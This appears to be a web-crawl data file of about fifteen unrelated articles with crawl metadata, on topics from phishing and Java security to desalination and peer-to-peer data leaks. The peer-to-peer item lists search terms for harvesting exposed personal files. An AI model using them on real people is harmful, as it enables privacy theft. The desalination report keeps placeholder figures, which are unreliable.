All of these attacks only affect Windows machines. If you read your mail on your mobile device you are less likely to be hacked. Sometimes a malicious document will claim that the content is only available on Windows machines, so you should go and read it on one. It’s easy to make a document cross platform, but it is harder to do that for a malware attack, so this is another big red flag.
To conclude, phishing for information or access is as much or more of a problem as phishing for financial data. You may be subject to phishing attacks not only because of who you are, but also because of who you communicate with or do business with. (The Target breach was started by a phishing attack on their HVAC contractor.) Treat all unsolicited email with extreme suspicion, don’t click on links or open attachments, and use secure methods of communication rather than email wherever possible. | <urn:uuid:d7faaa7c-efde-4aa9-b63c-dd6abfa187f4> | CC-MAIN-2017-04 | https://blog.cloudmark.com/2016/11/16/spear-phishing-not-just-for-finance/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00436-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953761 | 1,506 | 2.6875 | 3 |
Summer heat increases need for medication temperature monitoring
Wednesday, Jul 24th 2013
As extreme heat grips the country, pharmacies, patients and anyone else storing prescription drugs need to keep medication cool using temperature monitoring equipment in order to ensure its effectiveness.
In months like July and August, temperatures can easily exceed 90 degrees Fahrenheit in most of the United States on an especially hot day. Inside cars or mailboxes, temperatures can get as high as 100 degrees or even up to 140 degrees F. Although this is not new information, it is especially noteworthy for anyone storing prescription medication.
Not everyone may realize it, but prescription medication can break down under extreme heat. Papatya Tankut, vice president of professional pharmacy services for CVS pharmacy, told AgingCare.com that ideally prescription drugs should be kept at a temperature between 68 and 77 degrees.
However, proper storage can vary depending on the type of drug in questions, according to AgingCare.com. For instance, inhaled prescriptions, diabetes medication and eye drops often have specific care instructions that can fall outside the median norm. When prescription medication is not kept under these ideal conditions, the heat can change the chemical composition of the drug in question and potentially make them ineffective, pharmacist Khoa Huynh told ABC affiliate KFSN.
How summer affects prescription drug temperature monitoring
For most individuals and organizations, keeping medication at this range at all times is simple thanks to temperature-controlled rooms or cold storage units. However, summer can complicate these measures.
In particular, the transportation aspect of the prescription drug supply chain is especially fraught with potential issues during the summer. Even though a medication may be kept at ideal conditions at the pharmacy, leaving it in a hot car or inside a mailbox for even a few hours can render the drug unusable. As such, organizations and people should take every precaution possible to limit the amount of time a medication is transported in a vehicle during the summer months. After all, even forgetting a bottle of pills in a car for just a few minutes can be all the time that's needed for them to go bad.
"We should always check," Huynh advised people who transport medication in their cars, according to KFSN. "Definitely check the backseat, check your console just to make sure you don't have any of your eye drops or medications and just take it out, take it with you, put it in your bag and it should be safe that way."
Another potential issue is the threat posed by brownouts and blackouts. Between severe thunderstorms or air conditioning units draining electricity resources, power outages are a constant problem in many parts of the country during the summer months. As such, individuals and organizations that keep prescription medication in refrigeration units should be sure to have contingency plans in place just in case the power goes out, according to AgingCare.com.
Regardless of the time of year, healthcare providers and others should utilize temperature monitoring equipment like a temperature sensor to make sure prescription drugs are always kept at the right temperature. Since heat can damage life-saving medication, it is imperative that the drugs are not placed in a room that will cause them to break down and become ineffective. | <urn:uuid:1e035a99-8370-4115-887e-d2efb69f055b> | CC-MAIN-2017-04 | http://www.itwatchdogs.com/environmental-monitoring-news/healthcare/summer-heat-increases-need-for-medication-temperature-monitoring-477397 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00252-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943525 | 647 | 2.59375 | 3 |
After 20 years, the Java phenomenon just keeps going
This year marks the 20th anniversary of one of the most widely-used programming languages in computing: Java. Given how prolific it continues to be, Java has undoubtedly revolutionized IT and has permeated computing to the point where despite its age, it is still one of the most relevant and highly applicable languages available. To properly understand the impact of Java on computing and its future, it’s important to understand where Java came from, and how (and why) it was conceived of in the first place.
Java was born in the early 1990s out of a frustration with Sun Microsystems’s C++ and C application programming interfaces (APIs), and the desire to build a functional alternative to C++ and C programming languages. Three primary objectives underscored the creation of Java: 1) to replace C and C++ (languages from which Java derived much of its syntax) with a more functional, robust design, 2) to enable the building and deployment of apps for the Internet, and 3) to be lightweight, portable, and able to function in distributed environments.
Java, which has been owned and curated by Oracle Corporation since 2010, was developed at a time when the Internet was just beginning to gain traction with the masses. It was fundamentally designed to operate and usher in a new era of internet-based programming and the pre-eminence of the World Wide Web. (In 2015, Oracle offers a fistful of Java certifications, and is currently offering an anniversary discount of 20 percent off the cost of exams.)
The fact that Java is such a well-founded programming language has given it time to mature and find several specific facets of programming in which it remains unmatched. Despite the fact that two decades have passed since its original conception, Java is still one of the most popular, widely-used programming languages because it successfully solved many of the problems that plagued programmers in the early 1990s — and continues to solve these problems today.
Advantages of Java
Mild Learning Curve: One of the primary advantages of Java is its relatively mild learning curve. This stems largely from the fact that much of its syntax is derived from various C-based programming languages that programmers and developers are already amply proficient in. Java was designed specifically with ease of use in mind, making it significantly easier to learn, write, compile and debug than other programming languages.
Platform Independence: As was previously mentioned, portability was such a key feature that Java’s original creators wanted to underscore every aspect of it. A major reason for Java’s sustained popularity is its platform independence at both the source and binary levels, meaning that Java programs can be run on many different types of computers. As long as the computer in question has a Java Runtime Environment (JRE) installed, virtually any computer can run Java applications whether it’s a cell phone, a Windows PC, an Apple computer, or a Linux/Unix platform.
Object-orientation: Java’s programming syntax is object-oriented, meaning that its programs consist of elements referred to as objects. Object-oriented languages liked Java allow users to write reusable code and create modular programs and applications.
Distribution: Java was designed specifically to be distributed, meaning that Java contains an easy-to-use, robust platform that allows two or more computers to work on a network. Users and proponents of Java have repeatedly cited the unmatched ease of writing networking programs in Java as one of its principal advantages when compared to other programming languages.
Despite its obvious advantages over other programming languages, recent years have exposed significant security issues inherent to Java that make many industry experts question its long-term viability as a widely-used computing language.
Java contains several security vulnerabilities that make it especially prone to malicious attacks from hackers and other undesirable third-parties. Specifically, significant weaknesses in Java’s sandboxing mechanism allow skilled hackers to bypass security restrictions imposed by the security manager. Additionally, the Java class library contains several vulnerabilities that hackers can easily exploit.
Traditionally, Java applications employed either testing-based or network-based security programs, neither of which has proven successful in fixing Java’s substantial security issues. Network-based approaches have proven clumsy at best, as they rely on loose security standards to ensure that authorized traffic is not improperly categorized as unauthorized and blocked accordingly. Testing-based security programs on the other hand often generate far too many frivolous security holes and as a result, make it difficult for developers to prioritize key security issues and focus their efforts mostly on them.
It is worth noting that a substantial portion of Java’s security problems stem from the fact that less than one percent of enterprises were running the latest version of Java according to a 2013 survey conducted by Bit9 that analyzed roughly 1 million endpoints at hundreds of enterprises across the globe. This stems largely from the fact that patching Java is a particularly tedious and time-consuming process.
The Future of Java
While certainly far from perfect, Java contains several integral features and characteristics that continue to drive its popularity and, as such, it is likely that Java will continue to be a popular and widely-trusted programming language for years to come. While some of this sustained popularity is undoubtedly inertia and derivative of the fact that so many large organizations and enterprises already use Java, the success of Android (which uses Java extensively) demonstrates that the programming language can certainly adapt to changing trends in technology and the marketplace.
Java is seeing especially prominent rates of adoption in Big Data and The Internet of Things (IoT). In recent years, the amount of data that we produce (and subsequently analyze) has grown exponentially, and Java has rapidly evolved to become the developers’ language of choice for Big Data analysis and the IoT. Programmers cite the adoption of Java by industry giants such as Facebook, Java’s extensive and exceptional collection of open source libraries, and the fact that it is already as widespread as the major reasons why Java will sustain the future of Big Data and the IoT for the foreseeable future.
Despite its security flaws and its age, Java has reshaped the world of programming and will likely continue to do so for years to come. 2015 marks the marks its twentieth anniversary and given Java’s remarkable ability to stay relevant despite massive and constant changes in technology over the past twenty years, it is likely that we will be celebrating the language’s 25th anniversary in 2020. | <urn:uuid:275c9b41-3306-44c0-9fe1-3d2579a9d8d3> | CC-MAIN-2017-04 | http://certmag.com/20-years-java-phenomenon-just-keeps-going/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00068-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959197 | 1,316 | 3.015625 | 3 |
Patents are out of bounds when it comes to standard protocols.Theres a reason for the U.S. Patent and Trademark Office. It was created to foster invention by rewarding inventors for their time and trouble by granting temporary monopoly protection for the fruits of their labor. The net result is a benefit to society: Rewarding inventors tends to bring about more invention and economic productivity. Because patent applications mandate disclosure, the patent process has social advantages over trade-secret alternatives. However, if a given law or enforcement pattern of a lawincluding patent lawresults in harm to society, then its time to change the laws. Patents on software carry the potential of harm to the software industry and thereby to the economy. Equally problematic are the so-called method patents, or patents on application behavior, such as Amazons famousor infamousone-click patent.
How dangerous are software patents? Information Builders President and CEO Gerald Cohen warned eWEEK editors that the presence of patents is a scourge to the industry. Cohen has seen much innovation in a patent-free climate. Now he and other software leaders are being threatened with lawsuits. Software companies need to create software, which, after all, often has a short shelf life. They do not need to spend precious resources hiring expensive attorneys. Copyright protection should be enough. A copyright protects original expression; its existence encourages software developers to seek new ways of presenting function to users and of streamlining integration behind the scenes. | <urn:uuid:6ae10b3d-38c1-4ee4-94a3-24cfda45eef9> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Application-Development/Patent-Progress | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00462-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934232 | 297 | 2.53125 | 3 |
Imagine working in an environment where more than 50 languages are spoken. How would first responders communicate with the victims during an emergency?
In February 2004, this was an issue for more than 2,000 employees at the John Morrell pork plant in Sioux Falls, S.D., when ammonia diffused throughout the facility, causing a mass evacuation during frigid winter temperatures. More than 100 people were injured. Erroneous calls and a major language barrier hindered the Sioux Falls Fire Department's initial stages of response.
"Initially the call was [that] someone was injured in a piece of machinery, and it was later changed to a minor fire," said Jim Sideras, the department's fire chief. "When crews got there it was just one fire truck and then they realized that it was a significant event. The first call always seems to be wrong."
Ammonia - a colorless, pungent gas - is commonly used as a refrigerant and for food preservation at meatpacking facilities. Exposure to the gas usually causes irritation to the respiratory system, eyes and skin. Though the gas is mostly harmless in small doses, inhalation in high concentrations can cause lung damage and even death.
Because ammonia is considered a toxic chemical, the U.S.
Occupational Safety and Health Administration requires that it be handled as a hazardous waste, which meant response needed to be swift, organized and well executed, despite all the obstacles.
With so many variables involved - lack of equipment, communication barriers and weather - emergency responders faced many hurdles to gain control of the situation.
The response was divided into three operations: a rescue operation to evacuate people who were in the plant; a hazardous materials operation to handle the leak; and an emergency medical services (EMS) branch to provide medical treatment.
EMS used START triage - simple triage and rapid transport/treatment - for casualty care. START triage classifies the severity of casualties by the colors red, yellow, green or black using an RPM (respiratory, perfusion and mental status) system.
"When you think about RPMs, you think about cars and what a red line is. When the respirations are over 30 [per minute] they're going to be classified as red. If they have a capillary refill, which means you push down on your thumbnail and it's longer than two seconds [for color to return], that is going to be a red," Sideras said. "What that means is they are not perfusing very well and might have internal bleeding or hemorrhaging. So that's what "P" is: perfusion. The M is mental status. If they can't answer simple questions and squeeze my fingers, they could have a head injury. So those would be classified as red."
START is a simple method, but triage tags are a necessity that was lacking during the pork plant response. "We didn't have a consistent triage tag for our system. It sounds like a minor thing, but it really wasn't," Sideras said. "Having a consistent triage tag ensures that every responder is going off the same triage tags."
Emergency responders worked around this obstacle by using ribbons, but South Dakota has since implemented statewide triage tags, which means care is consistent and responders are on the same page.
The wintry weather and communication barriers - multiple spoken languages and inconsistent radio reception - were other obstacles for first responders. "One of the difficulties was that the incident happened in February and in South Dakota it's about 10 degrees out," Sideras said, adding that responders weren't prepared to handle
a mass casualty event indoors. "We also had difficulty with communication, because where we set up the treatment areas indoors, for some reason we could not get the radios or cell phones to work very well, so sometimes we actually had to go outside to use the radios."
Although the fire department couldn't do much to solve the patchy radio and cell phone reception, they overcame on-site communication barriers using interpreters to ascertain information from casualties to help with triaging. "The plant has interpreters. They are identified by a certain color of hardhat. We did have some people who were actually interpreters, and we also had some people who were bilingual and could help," Sideras said.
As for radio communication, the department's crew had to trek inside and out to correspond with each other and the hospital. Even though communication was hampered, having direct contact with the hospital's emergency department helped immensely.
"It worked out," Sideras said, "but if we didn't have cell numbers for the direct lines into the hospital ER, it would have been much more difficult because we would have been trying to get through switchboards."
Emergency crews controlled the incident by improvising on scene and using their resources - fire department tags and translators - wisely. The hazardous materials team stemmed the ammonia leak by allowing it to dissipate in the air.
With the situation under control, both teams rest assured that business could resume normally. Sideras said he's confident that if the incident were to happen again, the response would go much more smoothly with all of their lessons learned.
"Break everything down into three to five things, work on them and figure out how to meet those things to reach your strategic objective," he said. "We teach our incident commanders, we critically review every incident we go on ... every major incident. The first question is, 'What were your strategic goals?' A lot of people are doing the task before they know what the strategy is for the incident." | <urn:uuid:7cc07313-966e-42f5-9e94-c30166d01f47> | CC-MAIN-2017-04 | http://www.govtech.com/dc/articles/102472609.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00372-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.979793 | 1,146 | 3.328125 | 3 |
This three-day instructor-led course teaches students how to use the powerful features and capabilities of IBM WebSphere Business Modeler V7, as well as key business process management (BPM) practices, to map, document, and analyze business processes.
WebSphere Business Modeler V7 enables the visualization, documentation, modeling, and analysis of business processes for understanding and process execution. Business Modeler provides a comprehensive view of the processes that underlie how organizations do business, which allows users to document business processes and to improve them through business process analysis.
In this course, students receive intensive training in documenting business processes and conducting analysis with WebSphere Business Modeler V7. The course begins with an overview of Business Modeler and the concept of business processes. Students learn how to document business processes by creating business process diagrams with Business Process Modeling Notation (BPMN). Students also learn how to define human tasks and business rules tasks, validate the process model, and apply common modeling patterns.
Hands-on lab exercises include creating process models using the Swimlane editor, project versioning using Rational ClearCase, and performing team collaboration by using WebSphere Business Compass with Business Space powered by WebSphere. Students then apply what they learned, using these concepts and techniques to develop their own models based on a provided business scenario. | <urn:uuid:0c296c40-3632-4ef0-a691-c2bb612b55d9> | CC-MAIN-2017-04 | https://www.globalknowledge.com/ca-en/course/119589/ibm-websphere-business-modeler-v7-process-mapping-and-analysis-1/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00362-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91275 | 269 | 2.734375 | 3 |
You know how people who spend too much time in the sun look older than they are? It's the same for Earth's only natural satellite: A few billion years of exposure with no atmosphere to block the sun's radiation, and suddenly passing asteroids are calling you "the old dude." I kid, of course. Asteroids aren't nearly that rude. But it does appear that scientists were slightly off in their initial estimates of the moon's age. From Phys.org:
Improved age data for the Moon suggests that it is much younger than previously believed according to scientists presenting at a Royal Society discussion meeting entitled Origins of the Moon this week. Professor Richard Carlson of the Carnegie Institution of Washington will say that Earth's Moon is more likely between 4.4 and 4.45 billion years old rather than 4.56 billion years old, as previously thought.
So the moon may be about 100 million years younger than we first believed. Granted, that's like finding out your mother is two weeks younger than you thought. But still! Besides requiring the moon to change its date of birth on its Facebook page, does this matter? Yes, according to Professor Richard Carlson of the Carnegie Institution of Washington, who explains to Phys.org: "There are several important implications of this late Moon formation that have not yet been worked out," Carlson says. "For example, if the Earth was already differentiated prior to the giant impact, would the impact have blown off the primordial atmosphere that formed from this earlier epoch of Earth history?" Beats me, professor. Let me check Wikipedia and I'll get back to you. Now read this: | <urn:uuid:7aa29688-255c-4d3b-bcb4-20abf62bf47b> | CC-MAIN-2017-04 | http://www.itworld.com/article/2704581/enterprise-software/moon-is-100-million-years-younger-than-we-thought--and-that-s-what-too-much-sun-can-do-you-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00022-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.965193 | 326 | 3.453125 | 3 |
From R2D2 to a spacefaring bear, people around the world are pushing the limits of the mini-computer.
The Raspberry Pi foundation has recently announced that a million of the small, cheap computers aimed at transforming computer education have now been manufactured in the UK. But the Pi isn’t only a British success story, but an international one.
With millions sold worldwide, the most successful British computer since the ’80s is transofrming how people learn, create and code with their electronics. Thousands upon thousands of DIY projects have been posted online since the Pi’s inception in February 2012, and here, CBR gives you five of the coolest, most awesome Pi projects we’ve seen around the web.
Ph. D student Lingxiang Xiang customised this Hasbro R2D2 Star Wars toy for his girlfriend with a Raspberry Pi.
It moves, has voice recognition, motion detection, distance detection, Wi-Fi, a camera and face recognition software.
The little robot can obey commands like ‘come here’, ‘turn left’ and ‘record’, just like the real thing!
The Pi inside is running the Debian-based Raspbian OS.
A lot of technical know-how has gone into putting R2D2 together, but the whole system runs on the core of a Raspberry Pi with the Debian-based installed. Linxiang is planning on posting instructions on how to make your own clever R2 unit online soon.
Facial recognition was implemented usingOpenCV. Voice commands in either English or Chinese were made possible byPocketSphinx.
It must have done wonders for Xiang’s relationship, as his girlfriend is now his fiance. | <urn:uuid:628476fc-4985-4793-a1a5-282ac5f748fc> | CC-MAIN-2017-04 | http://www.cbronline.com/news/enterprise-it/top-5-coolest-raspberry-pi-projects-4146573 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279489.14/warc/CC-MAIN-20170116095119-00326-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.948152 | 361 | 2.734375 | 3 |
L2TP Attributes Summary
Projected L2TP standard was made available in the year 1999 by means of RFC 2661. It was originated primarily from two different tunneling protocols, named as: Point-to-Point communication protocol and PPTP (Point to Point Tunneling protocol). In other words, L2TP (Layer 2 Tunnel Protocol) is an up-and-coming IETF (Internet Engineering Task Force) standard that came in front with the traits of two on-hand tunneling protocols, named as: Cisco’s L2F (Layer 2 Forwarding) and Microsoft’s PPTP (Point-to-Point Tunneling Protocol). L2TP protocol is actually an expanded form of the PPP (a significant constituent for VPNs).
VPNs (virtual private networks) may let the user to connect to the corporate intranets/extranets. VPNs provides cost-effective networking but long-established dial-up networks hold up only registered IP (internet protocol) addresses, which are used to limit the applications types for VPNs. The main reasons for L2TP utilization is its support to multiple protocols along with holding of unregistered and privately directed IP addresses.
L2TP may be used as a part of ISP (internet service provider) delivery of services. But in such cases, it may remain powerless in providing any kind of encryption service for having privacy feature, etc. That’s why it is usually dependant upon an encryption offering protocol.
But L2TPv3 is branded as the latest version of under discussion protocol, which was introduced in RFC 3931(2005). And this most up-to-date version offered added security features, enhanced encapsulation, along with the capacity to take data links, etc.
Packet’s structure for L2TP
An L2TP packet is made up of different fields as: flags and version information (0-15 bits) field, length (16-31bits) field but it is an optional field, Tunnel ID (0-15 bits) field, session ID (16-31 bits) field, Ns (0-15 bits) optional field, Nr (16-31 bits) optional field, offset size (0-15 bits) optional field, offset pad (16-31 bits) optional field and payload data field of variable length.
Packet’s exchange in case of L2TP
At L2TP connection set up time, lots of control packets may be swapped between server side and client side in order to create tunnel and session so to be used for every direction. With control packets help, one peer may request to other peer for the assignment of a particular tunnel plus session id so data packets by using them (tunnel and session id) can make exchanges with the PPP frames.
Further that L2TP control messages list is exchanged in connecting LAC and LNS, for the purpose of handshaking previous to the establishment of a tunnel plus session.
L2TP tunnel models
An L2TP tunnel may make bigger across the complete PPP session or else across simply one part of a session with two segments. Different tunneling models can be used to represent this state of affairs and these models are named as: voluntary tunnel model, compulsory tunnel model (for incoming call), compulsory tunnel model (for remote dial up connection plus L2TP multi-hop connections).
- Supporting Multi-hop
- Operate like a client initiated Virtual Private Network (VPN) solution
- Cisco’s L2F offered value-added traits, as load sharing plus backup support | <urn:uuid:d5650f1c-72ec-4dcd-b22e-423a5fe47c82> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/2013/l2tp | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00050-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.874883 | 743 | 3.25 | 3 |
Early efforts at desalination, large-scale water filtration for drinking and other purposes began during the 1960s with Bahrain and Kuwait setting up the first plants, using the MED (multi-distiller effect) technology. During the mid-twentieth century, Kuwait became the first member of GCC (Gulf Cooperation Council) to use MSF (Multi-Stage Flash) distillation technology. The GCC represents a group of wealthy nation states with an increasing demand for freshwater. Desalination plants power both municipalities as well as businesses in the GCC. The contracted capacity of existing desalination plants is anticipated to increase over time. This is despite the fact that over 43% of all contracted plants around the world currently exist in GCC. As of 2013, almost 70% of the total global contracted and online capacity came from the GCC.As of 2015, the desalination market in GCC was worth USD X.X billion. The market size is expected to grow at a CAGR of XX.XX%.
The depleting natural precipitation and ground-water levels and increasing population are the major drivers of the sector in the region. A continued effort at increasing diversification of government income from hydrocarbons is another factor that has led to an increase in construction projects, industries, manufacturing plants, etc., leading to more demand for fresh water. Moreover, the government is supporting and encouraging the establishment of desalination plants to meet the nation’s demands.
Restraints and Challenges
The biggest challenge of desalination is the cost. As per a study, the cost of desalinated water per meter cube was USD 1.04, 0.95 and 0.82 for MSF, MED, and RO, assuming a fuel cost of USD 1.5/ GJ. Moreover, energy accounts for approximately three-fourths of the supply cost of desalination. Transportation cost is also added to the overall cost, making desalination a very costly process. Another negative impact of desalination is on the environment with the treatment of brackish water leading to pollution of fresh water resources and soil. Discharge of salt on coastal or marine ecosystems also has a negative impact.
The growing global outcry over climate change, majorly caused by the hype and awareness about the environmental effects of greenhouse gas emissions at the Global Climate Change Summit in Paris in 2015, has opened up large investment avenues in the desalination market in GCC. Many GCC countries intend to make desalination the source of 100% public potable water supply. Moreover, the nations are inviting more and more foreign investments in the region to keep up with the domestic needs that are continuously on the rise due to increase in the number of construction projects, manufacturing industries, etc.
About the Market
PESTLE Analysis (Overview): Macro market factors pertinent to this region
Market Definition: Main as well as associated/ancillary components constituting the market
Key Findings of the Study: Top headlines about market trends & numbers | <urn:uuid:82b9377d-b020-4108-b747-4630d24b63cd> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/analysis-of-the-desalination-industry-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00472-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943151 | 610 | 3.34375 | 3 |
Breaches of Health Care Data: A Growing Epidemic
Few types of data are as sensitive and valuable as protected health information (PHI). Unfortunately, theft of this information is becoming a regular event. According to the "Verizon 2015 Protected Health Information Data Breach Report," 90 percent of industries in the medical and health care arena have experienced a PHI breach. Verizon examined datasets across 25 countries, and it's clear that the problem has reached a critical point. Several major breaches occurred in the U.S. recently, including incidents at the U.S. Department of Health and Human Services (HHS) and the U.S. Department of Veterans Affairs (VA). What's surprising—and disturbing—is that most organizations that are outside of the health care industry don't realize that they also store this type of data. Common sources of protected health information include employee records (such as health insurance claims and Workers' Compensation claims) and information stored in companies' wellness programs. Verizon reports that this information is generally not protected very well. The report states that "Health care providers [need to] better proactively defend patient data from prying eyes; assess processes, procedures and technologies that affect the security of these records; and prescribe a proactive treatment that will help the 'cyber-immune system.'" Here's a look at some key findings. | <urn:uuid:3e90d6a3-0f17-4cfa-b96f-a40b7d491ad8> | CC-MAIN-2017-04 | http://www.baselinemag.com/security/slideshows/breaches-of-health-care-data-a-growing-epidemic.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00196-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952364 | 272 | 2.53125 | 3 |
Security researchers Larry Pesce and Mick Douglas demonstrated on Friday – at this year’s ShmooCon security conference in Washington, D.C – the amazing variety of sensitive information that people send out out over peer-to-peer networks, without a thought as to what would happen if such information fell into the wrong hands.
Using search terms such as word, doctor, health, passwd, password, lease, license, passport and visa; file names like password.txt, TaxReturn.pdf, passport.jpg, visa.jpg, license.jpg and signons2.txt; and a myriad of file extensions, they managed to get their hands on tax forms containing complete personal information of the taxpayer, IRS forms with identification numbers on it, driver’s licenses and passports, event schedules (names, hotel room numbers, performance dates and locations), financial retirement plans, and even information about a student that offered to help U.S. forces in Iraq and is currently hiding for fear of torture and death!
The conclusion? Security awareness is still nonexistent among the typical low-level users, and the process of education must be continued for as long as it takes to make everybody aware of the dangers of sharing sensitive and/or personal information through insecure channels.
Network World reports that the two researchers also presented the Cactus Project, whose purpose is to help organizations carry out this kind of research and impose changes to improve security when it comes to file sharing on the Gnutella bases P2P network. | <urn:uuid:f4b34962-4890-4283-ae64-b2ecc87b8f42> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/02/08/sensitive-information-retrieved-from-p2p-networks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00316-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933893 | 308 | 2.546875 | 3 |
The Difference Between Half and Full Duplex Explained
by Paul Wotel
means you're able to send and receive data (most often the human voice) from
the same device whether that be with your phone, 2-way radio, or PC.
Half-duplex devices let
you send and receive, but only one-way at a time. If you've ever used a walkie-talkie,
then you know what half-duplex conversations sound like. You have to push the
TALK button to send your message. But as long as you are holding the TALK key,
you can't hear what anyone else is saying. You must release the button to receive.
That's the big problem with
the old-fashioned speakerphone: it's only a step up from a walkie-talkie. In
essence, it pushes a virtual TALK button every time you start to speak and cuts
off the person on the other end. When you've finished speaking, the speakerphone
then transmits what the person on the other end is saying. Those cut-off sentences
and stop-start conversations can be frustrating to say the least. Two-way radio
etiquette has you saying "over" when you're finished speaking so whoever's
on the other end knows they can begin speaking. Can you imagine having to do
the same on all your business calls?
Enter full duplex
Actually, full duplex is nothing new. In fact, you already know exactly what
it sounds like. Your corded or cordless phones are full-duplex devices letting
you and your caller speak simultaneously without any dropouts in either one
of your voices.
It's when you use a hands-free speakerphone that you really appreciate full duplex. Conventional speakerphones
must shut the speaker off when the mic is activated so as not to pick up your
caller's voice and transmit it along with yours causing an echo effect. When
you speak, you can't hear what your caller is saying. This problem is really
compounded if both of you are using conventional speakerphones. A full-duplex
device digitizes the signal coming out of its speaker (your caller's voice).
It then edits this info out of the signal it's transmitting (your voice) using
a built-in digital processor similar to those found in PCs. This eliminates
echo effect and more importantly, does away with the on-off mic/speaker dilemma.
Full-duplex devices do all of this virtually instantaneously so your calls sound
natural and free-flowing. It's this technology that differentiates high-end
conferencing systems from ordinary, half-duplex speakerphones.
What's "digital duplex"?
Panasonic is trying to rectify the sometimes awful, always annoying half-duplex
sound quality typical of conventional speakerphones by using what they call
Digital Duplex technology. While it doesn't quite deliver the same sound quality
as full duplex, the special digital circuitry does help reduce the echo and
What about talking on the internet?
If you're using your PC to talk on the internet, it's best to install a full-duplex
sound card in your PC. Because internet talk has a host of obstacles specific
to the medium it must overcome—bandwidth, internet traffic, connection
speed—why add the frustration of stop-start, half-duplex conversations?
The time and cost of a full-duplex sound card are worth it.
Still have questions? E-mail
us at email@example.com
and our knowledgeable Customer Service Representatives will be happy to help | <urn:uuid:c2add70b-c4c6-4a3f-a3ea-af33044c9114> | CC-MAIN-2017-04 | http://telecom.hellodirect.com/docs/Tutorials/DuplexExplained.1.080801.asp | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00345-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.933916 | 771 | 2.71875 | 3 |
A process is an instance of a computer program that is being executed. It starts when a program is initiated by a command or another program, and it contains the program code and other data associated with the process. There are processes that are necessary for the operating system to run, and every program (such as a MySQL or Apache server) also depends on one or several running processes. Some processes can start child processes. By default, child processes exist until they are terminated or until the parent process terminates.
You can filter the list of processes by name and by the command that was used to start the process. This way you can see, for example, the number of processes started by the Apache server.
CPU usage of a process refers to the percentage of time that the process used the CPU to process data over a sample period of time. Most processes are idle much of the time. However, when two or more processes require the CPU a lot, this can lead to CPU contention and performance issues for all processes. In this case, you should adjust the priority of processes to ensure that critical processes get more access to the CPU than others. For example, on a web server, processes that deal with client requests should be prioritized over certain regular maintenance processes. You do not want tasks such as daily log archiving to affect the speed at which current client requests are served.
Memory usage of a process refers to the amount of physical memory (or main memory) that is used by the process. A process uses physical memory to store its intermediate computational data, the call stack, program code, and so on. Most modern programs create objects in the main memory and operate on them. If your server software does not properly discard unused objects, the amount of memory used by the server processes constantly increases until there is no free memory left for new objects, and the server crashes. This is known as a memory leak, which is a common problem for server software. Monitoring memory usage by your server processes can help you to identify a memory leak early and to react to the problem before your server crashes.
Using the Anturis Console, you can set up monitoring of the number of processes that fit a specific name or command-line mask, the CPU usage by these processes, and their memory usage. This can be done for any hardware component (a server computer) in your infrastructure by adding the Local Processes monitor to the component.
©2017 Anturis Inc. All Rights Reserved. | <urn:uuid:3fbfc06f-ab1c-4caa-8df2-f5b6d609e5e9> | CC-MAIN-2017-04 | https://anturis.com/monitors/local-processes-monitor/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00555-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949602 | 501 | 3.40625 | 3 |
Social Media’s Role in Crisis Communications
New and accessible communication platforms and technologies, such as blogs, social networking sites, Really Simply Syndication (RSS) feeds, and other formats, have the potential to reach more people with more relevant messages than ever before.
But the implications for managing messages to protect public health and safety—especially during times of crisis—can be staggering. Because anyone can create content and distribute it freely, it has become increasingly difficult for those involved in risk communications to control messaging. Government, nonprofit, and commercial organizations must improve their understanding of how to use social media to support their crisis communications strategies.
To better harness the power of social media tools, an expert round table met in Washington, D.C. in March 2009 to address the strategic challenges and opportunities of “Social Media and Risk Communications during Times of Crisis.”
Booz Allen Hamilton, the American Public Health Association, the George Washington University School of Public Health and Health Services, International Association of Emergency Managers, and National Association of Government Communicators co-sponsored the event.
The round table brought together a select group of thought leaders and practitioners from public health, emergency response, crisis communications, and social media arenas to discuss social media strategies before, after, and during crises. Identifying how social media is currently used during emergencies will help public health and emergency managers craft a unified strategy on applying social media to improve emergency communications.
